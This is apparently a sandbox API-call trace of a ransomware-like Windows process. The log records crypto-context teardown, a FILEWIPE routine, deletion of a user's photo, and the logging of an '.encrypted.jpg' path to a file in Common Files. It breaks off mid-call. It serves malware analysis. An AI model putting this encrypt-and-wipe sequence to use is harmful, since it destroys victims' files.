CryptDestroyKey (hKey=0x7c2280) returned 1 [0041.195] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.196] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.196] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0041.196] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x10c4ba0, ftLastWriteTime.dwHighDateTime=0x1d5b921, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0x7c2100 [0041.196] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.197] CharLowerBuffW (in: lpsz="byte[22270]", cchLength=0xb | out: lpsz="byte[22270]") returned 0xb [0041.197] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.197] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.197] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.197] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.198] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.198] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.198] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jynlg9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.199] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.200] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.200] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.200] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.200] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.201] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.201] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.201] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFilePart=0x0) returned 0x3e [0041.201] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x184393e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0x7c2100 [0041.201] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jynlg9.jpg")) returned 1 [0041.202] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x184393e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0 [0041.203] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.203] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.203] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.204] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.204] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.204] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.204] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.204] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.205] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.205] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.205] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.205] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.205] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.205] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.206] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x309e, lpOverlapped=0x0) returned 1 [0041.207] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.207] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x309e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.207] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.encrypted.jpg\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0041.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f36e0 [0041.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.encrypted.jpg\r\n", cchWideChar=75, lpMultiByteStr=0x7f36e0, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 75 [0041.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.207] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, 